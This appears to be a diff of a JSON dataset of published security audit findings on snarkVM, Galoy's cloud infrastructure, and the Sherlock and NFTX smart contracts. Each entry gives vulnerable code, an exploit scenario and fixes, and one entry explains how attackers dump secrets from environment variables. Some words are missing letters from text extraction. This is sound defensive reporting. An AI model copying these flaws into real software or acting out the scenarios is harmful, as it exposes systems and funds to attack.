Deployment constructor does not enforce the network edition value ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "The Deployment type includes the edition value, which should match the network edition value. However, this is not enforced in the deployment constructor as it is in the Execution constructor. impl Deployment { /// Initializes a new deployment. pub fn new( edition: u16, program: Program, verifying_keys: IndexMap, (VerifyingKey, Certificate)>, ) -> Result<Self> { Ok(Self { edition, program, verifying_keys }) } } Figure 24.1: vm/compiler/src/process/deployment/mod.rs#L37-L44 Recommendations Short term, consider using the N::EDITION value in the Deployment constructor, similarly to the Execution constructor.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "16. Kubernetes node pools are not configured to auto-upgrade ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "The Galoy application uses Google Kubernetes Engine (GKE) node pools in which the auto-upgrade functionality is disabled. The auto-upgrade functionality helps keep the nodes in a Kubernetes cluster up to date with the Kubernetes version running on the cluster control plane, which Google updates on the user's behalf. Auto-upgrades also ensure that security updates are applied in a timely manner. Disabling this setting is not recommended by Google and could create a security risk if patching is not performed manually. management { auto_repair = true auto_upgrade = false } Figure 16.1: The auto-upgrade property is set to false. ( modules/platform/gcp/kube.tf#124-127 ) Recommendations Short term, enable the auto-upgrade functionality to ensure that the nodes are kept up to date and that security patches are applied in a timely manner. Long term, remain up to date on the security features offered by Google Cloud. Integrate Terrascan or another automated tool into the development workflow to detect areas of improvement in the solution. References Auto-upgrading nodes, GKE documentation", + "title": "25. Map insertion return value is ignored ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "Some insertions into hashmap data types ignore whether the insertion overwrote an element already present in the hash map. For example, when handling the proving and verifying key index maps, the Option return value from the insert function is ignored: #[inline] pub fn insert_proving_key(&self, function_name: &Identifier, proving_key: ProvingKey) { self.proving_keys.write().insert(*function_name, proving_key); } /// Inserts the given verifying key for the given function name. #[inline] pub fn insert_verifying_key(&self, function_name: &Identifier, verifying_key: VerifyingKey) { self.verifying_keys.write().insert(*function_name, verifying_key); } Figure 25.1: vm/compiler/src/process/stack/mod.rs#L336-L346 Other examples of ignored insertion return values are present in the codebase and can be found using the regular expression \\.insert.*\\); . Recommendations Short term, investigate if any of the unguarded map insertions should be checked.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "17.
Overly permissive firewall rules ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "The VPC firewall configuration is overly permissive. This configuration, in conjunction with Google Cloud's default VPC rules, allows most communication between pods (figure 17.2), the bastion host (figure 17.3), and the public internet (figure 17.1). resource \"google_compute_firewall\" \"bastion_allow_all_inbound\" { project = local.project name = \"${local.name_prefix}-bastion-allow-ingress\" network = google_compute_network.vpc.self_link target_tags = [ local.tag ] direction = \"INGRESS\" source_ranges = [ \"0.0.0.0/0\" ] priority = \"1000\" allow { protocol = \"all\" } } Figure 17.1: The bastion ingress rules allow incoming traffic on all protocols and ports from all addresses. ( modules/inception/gcp/bastion.tf#92-107 ) resource \"google_compute_firewall\" \"intra_egress\" { project = local.project name = \"${local.name_prefix}-intra-cluster-egress\" description = \"Allow pods to communicate with each other and the master\" network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"EGRESS\" target_tags = [ local.cluster_name ] destination_ranges = [ local.master_ipv4_cidr_block, google_compute_subnetwork.cluster.ip_cidr_range, google_compute_subnetwork.cluster.secondary_ip_range[0].ip_cidr_range, ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } allow { protocol = \"ah\" } } Figure 17.2: Pods can initiate connections to other pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#1-23 ) resource \"google_compute_firewall\" \"dmz_nodes_ingress\" { name = \"${var.name_prefix}-bastion-nodes-ingress\" description = \"Allow ${var.name_prefix}-bastion to reach nodes\" project = local.project network = data.google_compute_network.vpc.self_link priority = 1000 direction = \"INGRESS\" target_tags = [ local.cluster_name ] source_ranges = [ data.google_compute_subnetwork.dmz.ip_cidr_range, ] # Allow all possible protocols allow { protocol = \"tcp\" } allow { protocol = \"udp\" } allow { protocol = \"icmp\" } allow { protocol = \"sctp\" } allow { protocol = \"esp\" } allow { protocol = \"ah\" } } Figure 17.3: The bastion host can initiate connections to pods on all protocols and ports. ( modules/platform/gcp/firewall.tf#44-64 ) Exploit Scenario 1 An attacker gains access to a pod through a vulnerability in an application. He takes advantage of the unrestricted egress traffic and misconfigured pods to launch attacks against other services and pods in the network. Exploit Scenario 2 An attacker discovers a vulnerability on the Secure Shell server running on the bastion host. She exploits the vulnerability to gain network access to the Kubernetes cluster, which she can then use in additional attacks. Recommendations Short term, restrict both egress and ingress traffic to necessary protocols and ports. Document the expected network interactions across the components and check them against the implemented firewall rules. Long term, use services such as the Identity-Aware Proxy to avoid exposing hosts directly to the internet, and enable VPC Flow Logs for network monitoring.
Additionally, integrate automated analysis tools such as tfsec into the development workflow to detect firewall issues early on. References Using IAP for TCP forwarding, Identity-Aware Proxy documentation", + "title": "26. Potential truncation on reading and writing Programs, Deployments, and Executions ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "When writing a Program to bytes, the numbers of import statements and identifiers are cast to a u8 integer, leading to the truncation of elements if there are more than 256 identifiers: // Write the number of program imports. (self.imports.len() as u8).write_le(&mut writer)?; // Write the program imports. for import in self.imports.values() { import.write_le(&mut writer)?; } // Write the number of components. (self.identifiers.len() as u8).write_le(&mut writer)?; Figure 26.1: vm/compiler/src/program/bytes.rs#L73-L81 During Program parsing, this limit of 256 identifiers is never enforced. Similarly, the Execution and Deployment write_le functions assume that there are fewer than u16::MAX transitions and verifying keys, respectively. // Write the number of transitions. (self.transitions.len() as u16).write_le(&mut writer)?; Figure 26.2: vm/compiler/src/process/execution/bytes.rs#L52-L53 // Write the number of entries in the bundle. (self.verifying_keys.len() as u16).write_le(&mut writer)?; Figure 26.3: vm/compiler/src/process/deployment/bytes.rs#L62-L63 Recommendations Short term, determine a maximum number of allowed import statements and identifiers and enforce this bound on Program parsing. Then, guarantee that the integer type used in the write_le function includes this bound. Perform the same analysis for the Execution and Deployment functions.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "18. Lack of uniform bucket-level access in Terraform state bucket ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "Uniform bucket-level access is not enabled in the bootstrap module bucket used to store the Terraform state. When enabled, this feature implements a uniform permission system, providing access at the bucket level rather than on a per-object basis. It also simplifies the access controls/permissions of a bucket, making them easier to manage and reason about. resource \"google_storage_bucket\" \"tf_state\" { name = \"${local.name_prefix}-tf-state\" project = local.project location = local.tf_state_bucket_location versioning { enabled = true } force_destroy = local.tf_state_bucket_force_destroy } Figure 18.1: The bucket definition lacks a uniform_bucket_level_access field set to true. ( modules/bootstrap/gcp/tf-state-bucket.tf#1-9 ) Exploit Scenario The permissions of some objects in a bucket are misconfigured. An attacker takes advantage of that fact to access the Terraform state. Recommendations Short term, enable uniform bucket-level access in this bucket. Long term, integrate automated analysis tools such as tfsec into the development workflow to identify any similar issues and areas of improvement.", + "title": "27.
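The truncation in finding 26 is easy to demonstrate in a std-only Rust sketch (the 300-import program and the helper names here are hypothetical): casting with `as u8` silently wraps modulo 256, whereas `u8::try_from` surfaces the overflow so a serializer can enforce the bound instead of writing a wrong count:

```rust
// Silently wraps: 300 imports are written as a count of 44 (300 mod 256).
fn import_count_lossy(imports: &[&str]) -> u8 {
    imports.len() as u8
}

// Surfaces the overflow so the caller can reject oversized programs.
fn import_count_checked(imports: &[&str]) -> Result<u8, String> {
    u8::try_from(imports.len()).map_err(|_| format!("too many imports: {}", imports.len()))
}

fn main() {
    let imports = vec!["credits.aleo"; 300];
    assert_eq!(import_count_lossy(&imports), 44); // silent corruption
    assert!(import_count_checked(&imports).is_err()); // explicit failure
}
```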
StatePath::verify accepts invalid states ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "The StatePath::verify function attempts to validate several properties in the transaction using the code shown in figure 27.1. However, this code does not actually check that all checks are true; it checks only that there are an even number of false booleans. Since there are six booleans in the operation, the function will return true if all are false. // Ensure the block path is valid. let check_block_hash = A::hash_bhp1024(&block_hash_preimage).is_equal(&self.block_hash); // Ensure the state root is correct. let check_state_root = A::verify_merkle_path_bhp(&self.block_path, &self.state_root, &self.block_hash.to_bits_le()); check_transition_path .is_equal(&check_transaction_path) .is_equal(&check_transactions_path) .is_equal(&check_header_path) .is_equal(&check_block_hash) .is_equal(&check_state_root) } Figure 27.1: vm/compiler/src/ledger/state_path/circuit/verify.rs#L57-L70 We marked the severity as informational since the function is still not being used. Exploit Scenario An attacker submits a StatePath where no checks hold, but the verify function still returns true. Recommendations Short term, ensure that all checks are true (e.g., by taking the conjunction of all booleans and checking that the resulting boolean is true).", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: Low" ] }, { - "title": "19. Insecure storage of passwords ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "Galoy passwords are stored in configuration files and environment variables or passed in as command-line arguments. There are two issues with this method of storage: (1) the default keys are low entropy (figure 19.1) and (2) the fact that there are default keys in the first place suggests that users deploying components may not realize that they need to set passwords. export BITCOINDRPCPASS=rpcpassword // (...) export MONGODB_PASSWORD=password // (...) export JWT_SECRET=\"jwt_secret\" Figure 19.1: An example configuration file with passwords ( .envrc#53-79 ) Passing in sensitive values through environment variables (figure 19.2) increases the risk of a leak for several reasons: Environment variables are often dumped to external services through crash-logging mechanisms. All processes started by a user can read environment variables from the /proc/$pid/environ file. Attackers often use this ability to dump sensitive values passed in through environment variables (though this requires finding an arbitrary file read vulnerability in the application). An application can also overwrite the contents of a special /proc/$pid/environ file. However, overwriting the file is not as simple as calling setenv(SECRET, \"******\"), because runtimes copy environment variables upon initialization and then operate on the copy. To clear environment variables from that special environ file, one must either overwrite the stack data in which they are located or make a low-level prctl system call with the PR_SET_MM_ENV_START and PR_SET_MM_ENV_END flags enabled to change the memory address of the content the file is rendered from. const jwtSecret = process.env.JWT_SECRET Figure 19.2: src/config/process.ts#12 Certain initialization commands take a password as a command-line argument (figures 19.3 and 19.4).
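Finding 27's parity behavior can be reproduced on plain booleans in a std-only Rust sketch (the circuit types are simplified away, so this illustrates only the boolean logic, not the snarkVM API). Folding a chain of equality comparisons returns true whenever the number of false checks is even, including the all-false case; the recommended conjunction does not:

```rust
// Mirrors the chained .is_equal(...) calls: ((c1 == c2) == c3) == ...
fn chained_equality(checks: &[bool]) -> bool {
    checks
        .iter()
        .copied()
        .reduce(|acc, check| acc == check)
        .unwrap_or(true)
}

// The recommended fix: all checks must hold.
fn conjunction(checks: &[bool]) -> bool {
    checks.iter().all(|&check| check)
}

fn main() {
    // Six failed checks: the chained comparison still "verifies".
    let all_false = [false; 6];
    assert!(chained_equality(&all_false));
    assert!(!conjunction(&all_false));

    // An odd number of failures happens to be caught.
    let five_false = [false; 5];
    assert!(!chained_equality(&five_false));
}
```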
If an attacker gained access to a user account on a system running the script, the attacker would also gain access to any password passed as a command-line argument. command: [ '/bin/sh' ] args: - '-c' - | if [ ! -f /root/.lnd/data/chain/bitcoin/${NETWORK}/admin.macaroon ]; then while ! test -f /root/.lnd/tls.cert; do sleep 1; done apk update; apk add expect /home/alpine/walletInit.exp ${NETWORK} $LND_PASS fi Figure 19.3: charts/lnd/templates/statefulset.yaml#65-73 set PASSWORD [lindex $argv 1]; Figure 19.4: charts/lnd/templates/wallet-init-configmap.yaml#55 In Linux, all users can inspect other users' commands and their arguments. A user can enable the proc filesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specified group. However, in many Linux distributions, those options are not enabled by default. Recommendations Short term, take the following actions: Remove the default encryption keys and avoid using any one default key across installs. The user should be prompted to provide a key when deploying the Galoy application, or the application should generate a key using known-good cryptographically secure methods and provide it to the user for safekeeping. Avoid storing encryption keys in configuration files. Configuration files are often broadly readable or rendered as such accidentally. Long term, ensure that keys, passwords, and other sensitive data are never stored in plaintext in the filesystem, and avoid providing default values for that data. Also take the following steps: Document the risks of providing sensitive values through environment variables. Encourage developers to pass sensitive values through standard input or to use a launcher that can fetch them from a service like HashiCorp Vault. Allow developers to pass in those values from a configuration file, but document the fact that the configuration file should not be saved in backups, and provide a warning if the file has overly broad permissions when the program is started.", + "title": "28. Potential panic in encryption/decryption circuit generation ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "The decrypt_with_randomizers and encrypt_with_randomizers functions do not check the length of the randomizers argument against the length of the underlying ciphertext and plaintext, respectively. This can cause a panic in the zip_eq call. Existing calls to the function seem safe, but since it is a public function, the lengths of its underlying values should be checked to prevent panics in future code. pub(crate) fn decrypt_with_randomizers(&self, randomizers: &[Field]) -> Plaintext { // Decrypt the ciphertext. Plaintext::from_fields( &self.iter() .zip_eq(randomizers) Figure 28.1: circuit/program/src/data/ciphertext/decrypt.rs#L31-L36 Recommendations Short term, add a check to ensure that the length of the underlying plaintext/ciphertext matches the length of the randomizer values.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "20. Third-party container images are not version pinned ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "The continuous integration (CI) pipeline and Helm charts reference third-party components such as Docker registry images by named tags (or by no tag at all).
Registry tags are not immutable; if an attacker compromised an image publisher's account, the pipeline or Kubernetes cluster could be provided a malicious container image. - name: build-chain-dl-image serial: true plan: - { get: chain-dl-image-def, trigger: true } - task: build privileged: true config: platform: linux image_resource: type: registry-image source: repository: vito/oci-build-task Figure 20.1: A third-party image referenced without an explicit tag ( ci/pipeline.yml#87-98 ) resource_types: - name: terraform type: docker-image source: repository: ljfranklin/terraform-resource tag: latest Figure 20.2: An image referenced by the latest tag ( ci/pipeline.yml#270-275 ) Exploit Scenario An attacker gains access to a Docker Hub account hosting an image used in the CI pipeline. The attacker then tags a malicious container image and pushes it to Docker Hub. The CI pipeline retrieves the tagged malicious image and uses it to execute tasks. Recommendations Short term, refer to Docker images by SHA-256 digests to prevent the use of an incorrect or modified image. Long term, integrate automated tools such as Checkov into the development workflow to detect similar issues in the codebase.", + "title": "29. Variable timing of certain cryptographic functions ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", "body": "The Pedersen commitment code computes the masking element [r]h by filtering out powers of h not indicated by the randomizer r and adding the remaining values. However, the timing of this function leaks information about the randomizer value. In particular, it can reveal the Hamming weight (or approximate Hamming weight) of the randomizer. If the randomizer r is a 256-bit value, but timing indicates that the randomizer has a Hamming weight of 100 (for instance), then the possible set of randomizers has only about 2^243 elements. This compromises the information-theoretic security of the hiding property of the Pedersen commitment. randomizer.to_bits_le().iter().zip_eq(&*self.random_base_window).filter(|(bit, _)| **bit).for_each( |(_, base)| { output += base; }, ); Figure 29.1: console/algorithms/src/pedersen/commit_uncompressed.rs#L27-L33 Recommendations Short term, consider switching to a constant-time algorithm for computing the masking value.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "21. Compute instances do not leverage Shielded VM features ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "The bastion host definition does not enable all of Google Cloud's Shielded VM (virtual machine) features for Compute Engine VM instances. These features provide verifiable integrity of VM instances and assurance that VM instances have not been compromised by boot- or kernel-level malware or rootkits. Three features provide this verifiable integrity: Secure Boot, virtual trusted platform module (vTPM)-enabled Measured Boot, and integrity monitoring. Google also offers Shielded GKE nodes, which are built on top of Shielded VMs and provide strong verifiable node identity and integrity to increase the security of GKE nodes. The node pool definition does enable this feature but disables Secure Boot checks on the node instances.
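As a sketch of the constant-time structure that finding 29's recommendation points toward, the std-only Rust below replaces the filter with an unconditional masked accumulation (illustrative only: u64 arithmetic stands in for the group operation, and a real fix would need a constant-time point addition). Every bit is processed identically, so the running time no longer tracks the randomizer's Hamming weight:

```rust
// Data-dependent work: only set bits trigger an addition, so timing leaks
// the Hamming weight of `bits` (the pattern flagged in the finding).
fn masked_sum_variable(bits: &[bool], bases: &[u64]) -> u64 {
    bits.iter()
        .zip(bases)
        .filter(|(bit, _)| **bit)
        .fold(0u64, |acc, (_, base)| acc.wrapping_add(*base))
}

// Uniform work: every base is masked and added, whatever the bit pattern.
fn masked_sum_constant(bits: &[bool], bases: &[u64]) -> u64 {
    assert_eq!(bits.len(), bases.len());
    let mut acc = 0u64;
    for (&bit, &base) in bits.iter().zip(bases.iter()) {
        // All-ones mask when the bit is set, all-zeros otherwise.
        let mask = (bit as u64).wrapping_neg();
        acc = acc.wrapping_add(base & mask);
    }
    acc
}

fn main() {
    let bits = [true, false, true, true];
    let bases = [3u64, 5, 7, 11];
    assert_eq!(masked_sum_variable(&bits, &bases), 21);
    assert_eq!(masked_sum_constant(&bits, &bases), 21);
}
```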
shielded_instance_config { enable_secure_boot = false enable_integrity_monitoring = true } Figure 21.1: Secure Boot is disabled. ( modules/platform/gcp/kube.tf#168-171 ) Exploit Scenario The bastion host is compromised, and persistent kernel-level malware is installed. Because the bastion host is still operational, the malware remains undetected for an extended period. Recommendations Short term, enable these security features to increase the security and trustworthiness of the infrastructure. Long term, integrate automated analysis tools such as tfsec into the development workflow to detect other areas of improvement in the solution. References What is Shielded VM?, Compute Engine documentation Using GKE Shielded Nodes, GKE documentation", + "title": "1. Solidity compiler optimizations can be problematic ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", "body": "Sherlock has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Sherlock contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", "Severity: Undetermined", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "22. Excessive container permissions ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "Kubernetes containers launch processes under user and group IDs corresponding to users and groups on the host system. Container processes that are running as root usually have more permissions than their workload requires. If such a process were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, such as disabling the allowPrivilegeEscalation flag to ensure that a child process of a container cannot gain more privileges than its parent, dropping all Linux capabilities, and enforcing Seccomp and AppArmor profiles. We found several instances of containers run as root, with allowPrivilegeEscalation enabled by omission (figure 22.1) or with low user IDs that overlap with host user IDs (figure 22.2).
In some of the containers, Linux capabilities were not dropped (figure 22.2), and neither Seccomp nor AppArmor profiles were enabled. containers: - name: auth-backend image: \"{{ .Values.image.repository }}@{{ .Values.image.digest }}\" ports: - containerPort: 3000 env: - (...) Figure 22.1: Without a securityContext field, commands will run as root and a container will allow privilege escalation by default. ( charts/galoy-auth/charts/auth-backend/templates/deployment.yaml#24-30 ) securityContext: # capabilities: # drop: # - ALL readOnlyRootFilesystem: true runAsNonRoot: true runAsUser: 1000 runAsGroup: 3000 Figure 22.2: User ID 1000 is typically used by the first non-system user account. ( charts/bitcoind/values.yaml#38-45 ) Exploit Scenario An attacker is able to trigger remote code execution in the Web Wallet application. The attacker then leverages the lax permissions to exploit CVE-2022-0185, a buffer overflow vulnerability in the Linux kernel that allows her to obtain root privileges and escape the Kubernetes pod. The attacker then gains the ability to execute code on the host system. Recommendations Short term, review and adjust the securityContext configuration of all charts used by the Galoy system. Run pods as non-root users with high user IDs that will not overlap with host user IDs. Drop all unnecessary capabilities, and enable security policy enforcement when possible. Long term, integrate automated tools such as Checkov into the CI pipeline to detect areas of improvement in the solution. Additionally, review the Docker recommendations outlined in appendix E. References Kubernetes container escape using Linux Kernel exploit, CrowdStrike 10 Kubernetes Security Context settings you should understand, snyk", + "title": "2. Certain functions lack zero address checks ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", "body": "Certain functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, the AaveV2Strategy contract's constructor function does not validate the aaveLmReceiver, which is the address that receives Aave rewards on calls to AaveV2Strategy.claimRewards. constructor(IAToken _aWant, address _aaveLmReceiver) { aWant = _aWant; // This gets the underlying token associated with aUSDC (USDC) want = IERC20(_aWant.UNDERLYING_ASSET_ADDRESS()); // Gets the specific rewards controller for this token type aaveIncentivesController = _aWant.getIncentivesController(); aaveLmReceiver = _aaveLmReceiver; } Figure 2.1: managers/AaveV2Strategy.sol:39-47 If the aaveLmReceiver variable is set to the address zero, the Aave contract will revert with INVALID_TO_ADDRESS. This prevents any Aave rewards from being claimed for the designated token. The following functions are missing zero address checks: Manager.setSherlockCoreAddress AaveV2Strategy.sweep SherDistributionManager.sweep SherlockProtocolManager.sweep Sherlock.constructor Exploit Scenario Bob deploys AaveV2Strategy with aaveLmReceiver set to the zero address. All calls to claimRewards revert. Recommendations Short term, add zero address checks on all function arguments to ensure that users cannot accidentally set incorrect values. Long term, use Slither, which will catch functions that do not have zero address checks.", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "23.
Unsigned and unversioned Grafana BigQuery Datasource plugin ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", "body": "The BigQuery Datasource plugin is installed as part of the Grafana configuration found in the Helm charts. The plugin, which is unsigned, is pulled directly from the master branch of the doitintl/bigquery-grafana GitHub repository, and signature checks for the plugin are disabled. Grafana advises against running unsigned plugins. plugins: - https://github.com/doitintl/bigquery-grafana/archive/master.zip;doit-bigquery-datasource grafana.ini: plugins: allow_loading_unsigned_plugins: \"doitintl-bigquery-datasource\" Figure 23.1: The plugin is downloaded directly from the GitHub repository, and signature checks are disabled. ( charts/monitoring/values.yaml#10-15 ) Exploit Scenario An attacker compromises the doitintl/bigquery-grafana repository and pushes malicious code to the master branch. When Grafana is set up, it downloads the plugin code from the master branch. Because unsigned plugins are allowed, Grafana directly loads the malicious plugin. Recommendations Short term, install the BigQuery Datasource plugin from a signed source such as the Grafana catalog, and disallow the loading of any unsigned plugins. Long term, review the vendor recommendations when configuring new software and avoid disabling security features such as signature checks. When referencing external code and software releases, do so by immutable hash digests instead of named tags or branches to prevent unintended modifications. References Plugin Signatures, Grafana Labs 24. Insufficient validation of JWTs used for GraphQL subscriptions Severity: Low Difficulty: Low Type: Authentication Finding ID: TOB-GALOY-24 Target: galoy/src/servers/graphql-server.ts", + "title": "3. updateYieldStrategy could leave funds in the old strategy ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", "body": "The updateYieldStrategy function sets a new yield strategy manager contract without calling yieldStrategy.withdrawAll() on the old strategy, potentially leaving funds in it. // Sets a new yield strategy manager contract /// @notice Update yield strategy /// @param _yieldStrategy News address of the strategy /// @dev try a yieldStrategyWithdrawAll() on old, ignore failure function updateYieldStrategy(IStrategyManager _yieldStrategy) external override onlyOwner { if (address(_yieldStrategy) == address(0)) revert ZeroArgument(); if (yieldStrategy == _yieldStrategy) revert InvalidArgument(); emit YieldStrategyUpdated(yieldStrategy, _yieldStrategy); yieldStrategy = _yieldStrategy; } Figure 3.1: contracts/Sherlock.sol:257-267 Even though one could re-add the old strategy to recover the funds, this issue could cause stakers and the protocols insured by Sherlock to lose trust in the system. This issue has a significant impact on the result of totalTokenBalanceStakers, which is used when calculating the shares in initialStake. totalTokenBalanceStakers uses the balance of the yield strategy. If the balance is missing the funds that should have been withdrawn from a previous strategy, the result will be incorrect.
function totalTokenBalanceStakers() public view override returns (uint256) { return token.balanceOf(address(this)) + yieldStrategy.balanceOf() + sherlockProtocolManager.claimablePremiums(); } Figure 3.2: contracts/Sherlock.sol:151-156 function initialStake( uint256 _amount, uint256 _period, address _receiver ) external override whenNotPaused returns (uint256 _id, uint256 _sher) { ... if (totalStakeShares_ != 0) stakeShares_ = (_amount * totalStakeShares_) / (totalTokenBalanceStakers() - _amount); // If this is the first stake ever, we just mint stake shares equal to the amount of USDC staked else stakeShares_ = _amount; Figure 3.3: contracts/Sherlock.sol:483-504 Exploit Scenario Bob, the owner of the Sherlock contract, calls updateYieldStrategy with a new strategy. Eve calls initialStake and receives more shares than she is due because totalTokenBalanceStakers returns a significantly lower balance than it should. Bob notices the missing funds, calls updateYieldStrategy with the old strategy and then yieldStrategy.withdrawAll to recover the funds, and switches back to the new strategy. Eve's shares now have notably more value. Recommendations Short term, in updateYieldStrategy, add a call to yieldStrategy.withdrawAll() on the old strategy. Long term, when designing systems that store funds, use extensive unit testing and property-based testing to ensure that funds cannot become stuck.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: High" ] }, { - "title": "1. Reliance on third-party library for deployment ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", "body": "Due to the use of the delegatecall proxy pattern, some NFTX contracts cannot be initialized with their own constructors; instead, they have initializer functions. These functions can be front-run, allowing an attacker to initialize contracts incorrectly. function __NFTXInventoryStaking_init(address _nftxVaultFactory) external virtual override initializer { __Ownable_init(); nftxVaultFactory = INFTXVaultFactory(_nftxVaultFactory); address xTokenImpl = address(new XTokenUpgradeable()); __UpgradeableBeacon__init(xTokenImpl); } Figure 1.1: The initializer function in NFTXInventoryStaking.sol:37-42 The following contracts have initializer functions that can be front-run: NFTXInventoryStaking NFTXVaultFactoryUpgradeable NFTXEligibilityManager NFTXLPStaking NFTXSimpleFeeDistributor The NFTX team relies on hardhat-upgrades, a library that offers a series of safety checks for use with certain OpenZeppelin proxy reference implementations to aid in the proxy deployment process. It is important that the NFTX team become familiar with how the hardhat-upgrades library works internally and with the caveats it might have. For example, some proxy patterns like the beacon pattern are not yet supported by the library. Exploit Scenario Bob uses the library incorrectly when deploying a new contract: he calls upgradeTo() and then uses the fallback function to initialize the contract. Eve front-runs the call to the initialization function and initializes the contract with her own address, which results in an incorrect initialization and Eve's control over the contract. Recommendations Short term, document the protocol's use of the library and the proxy types it supports.
Long term, use a factory pattern instead of the initializer functions to prevent front-running of the initializer functions.", - "labels": [ - "Trail of Bits", - "Severity: Informational", "Difficulty: High" ] }, { - "title": "2. Missing validation of proxy admin indices ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Multiple functions of the ProxyController contract take an index as an input. The index determines which proxy (managed by the controller) is being targeted. However, the index is never validated, which means that the function will be executed even if the index is out of bounds with respect to the number of proxies managed by the contract (in this case, ve). function changeProxyAdmin(uint256 index, address newAdmin) public onlyOwner { } if (index == 0) { vaultFactoryProxy.changeAdmin(newAdmin); } else if (index == 1) { eligManagerProxy.changeAdmin(newAdmin); } else if (index == 2) { stakingProviderProxy.changeAdmin(newAdmin); } else if (index == 3) { stakingProxy.changeAdmin(newAdmin); } else if (index == 4) { feeDistribProxy.changeAdmin(newAdmin); } emit ProxyAdminChanged(index, newAdmin); Figure 2.1: The changeProxyAdmin function in ProxyController.sol:79-95 In the changeProxyAdmin function, a ProxyAdminChanged event is emitted even if the supplied index is out of bounds (gure 2.1). Other ProxyController functions return the zero address if the index is out of bounds. For example, getAdmin() should return the address of the targeted proxys admin. If getAdmin() returns the zero address, the caller cannot know whether she supplied the wrong index or whether the targeted proxy simply has no admin. function getAdmin(uint256 index) public view returns (address admin) { if (index == 0) { return vaultFactoryProxy.admin(); } else if (index == 1) { return eligManagerProxy.admin(); } else if (index == 2) { return stakingProviderProxy.admin(); } else if (index == 3) { return stakingProxy.admin(); } else if (index == 4) { return feeDistribProxy.admin(); } } Figure 2.2: The getAdmin function in ProxyController.sol:38-50 Exploit Scenario A contract relying on the ProxyController contract calls one of the view functions, like getAdmin(), with the wrong index. The function is executed normally and implicitly returns zero, leading to unexpected behavior. Recommendations Short term, document this behavior so that clients are aware of it and are able to include safeguards to prevent unanticipated behavior. Long term, consider adding an index check to the aected functions so that they revert if they receive an out-of-bounds index.", + "title": "4. Pausing and unpausing the system may not be possible when removing or replacing connected contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The Sherlock contract allows all of the connected contracts to be paused or unpaused at the same time. However, if the sherDistributionManager contract is removed, or if any of the connected contracts are replaced when the system is paused, it might not be possible to pause or unpause the system. 
